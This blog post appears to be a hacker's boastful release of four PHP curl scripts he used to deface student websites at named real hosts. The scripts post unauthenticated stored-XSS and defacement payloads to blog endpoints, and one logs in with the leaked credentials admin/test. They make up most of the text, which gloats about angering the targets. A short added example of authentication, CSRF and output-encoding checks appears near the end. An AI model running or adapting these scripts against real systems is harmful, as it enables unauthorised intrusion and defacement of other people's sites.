Exploit codes used against Landstede

Hey G33ks,
So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes :)
There were a total of 3 exploits.
All the exploit codes below are 100% how I used them; all URLs, usernames, passwords etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:

Exploit 1 - April 24 2017

Authentication is a luxury?

<?php
/*
* Exploit by FinlayDaG33k
* https://aberg.newdeveloper.nl/pages/blog.php
*/
/*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/
$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);
curl_close ($ch);
echo "Exploit send!";
?>

Exploit 2 - May 1 2017

Using username `admin` and password `test` is generally not a good idea on a website facing the whole world...

<?php
/*
* Exploit by FinlayDaG33k
* https://aberg.newdeveloper.nl/pages/blog.php
*/
/*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/ /* Move this comment line to enable the script */
$message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
$cookiefile = DIRNAME(__FILE__) . '/cookies.txt';
$f = fopen($cookiefile, "w");
fclose($f);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '-');
curl_setopt($ch, CURLOPT_VERBOSE, true);
$http_headers = array(
'Host: aberg.newdeveloper.nl',
'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
'Accept: */*',
'Accept-Language: en-us,en;q=0.5',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Connection: keep-alive'
);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $http_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$result = curl_exec ($ch); // Authenticate ourselves!
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($result, 0, $header_size);
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_exec ($ch);
curl_close ($ch);
*/?>
Exploit send!

Exploit 3 - May 4 2017

This guy trash-talked that I wouldn't be able to exploit his site; well, it worked anyway (hint: he got pissed) :)

<?php
/*
* Exploit by FinlayDaG33k
* https://cschotman.newdeveloper.nl/pages/blog.php
*/
/*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/
$message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
$postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
curl_close ($ch);
print_r($result);
echo "Exploit send!";
?>

Exploit 5 - May 4 2017 (same as Exploit #1, but against different target)

How was this one even possible?
I already exploited a site using the same mistake...
This one got them really mad btw :mrgreen:

<?php
/*
* Exploit by FinlayDaG33k
* https://pmetz.newdeveloper.nl/pages/blog.php
*/
/*
* "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
* <Aroop "FinlayDaG33k" Roelofs> wrote this file.
* As long as you retain this notice you can do whatever you want with this stuff.
* If we meet some day, you should buy me a drink.
* Hugs are mandatory when meeting me!
* Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
*/
$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);
curl_close ($ch);
echo "Exploit send!";
?>
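
The mistake behind Exploits 1, 3 and 5 is a blog endpoint that accepts a POSTed body without checking who sent it, and the XSS test strings probe whether that body is then rendered as raw HTML. As an added example (not the affected sites' code and not the author's), here is a hypothetical handler that requires a session and a CSRF token before storing and encodes on output; `authorize_post`, `render_item`, `user_id` and `csrf_token` are assumed names, only the `item` field is taken from the scripts above.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical server-side checks, not code from the page.

/** Decide whether a blog POST may be stored. Returns [httpStatus, reason]. */
function authorize_post(array $session, array $post): array
{
    // 1. The request must come from a logged-in session.
    if (empty($session['user_id'])) {
        return [401, 'not authenticated'];
    }
    // 2. It must carry the per-session CSRF token (constant-time compare).
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $sent)) {
        return [403, 'bad CSRF token'];
    }
    // 3. The body must be a non-empty string of bounded size.
    $item = $post['item'] ?? '';
    if (!is_string($item) || $item === '' || strlen($item) > 10000) {
        return [422, 'invalid item'];
    }
    return [200, 'ok'];
}

/** Encode stored text for an HTML body context so markup is shown, not run. */
function render_item(string $item): string
{
    return '<div class="post">'
        . htmlspecialchars($item, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</div>';
}

// Constructed sample requests (no real session data).
$token   = bin2hex(random_bytes(16));
$session = ['user_id' => 7, 'csrf_token' => $token];
$body    = '<h1>Hello</h1><script>alert(1)</script>';

var_dump(authorize_post([], ['item' => $body])[0]);        // anonymous sender
var_dump(authorize_post($session, ['item' => $body])[0]);  // session, no token
var_dump(authorize_post($session, ['item' => $body, 'csrf_token' => $token])[0]);
echo render_item($body), PHP_EOL;                          // tags arrive as text
```

The authorization check belongs in the script that writes the post, not only on the admin page that links to it, since the endpoint can be requested directly.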
 
 
Well, there ya have it :)
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now...[g33kout]
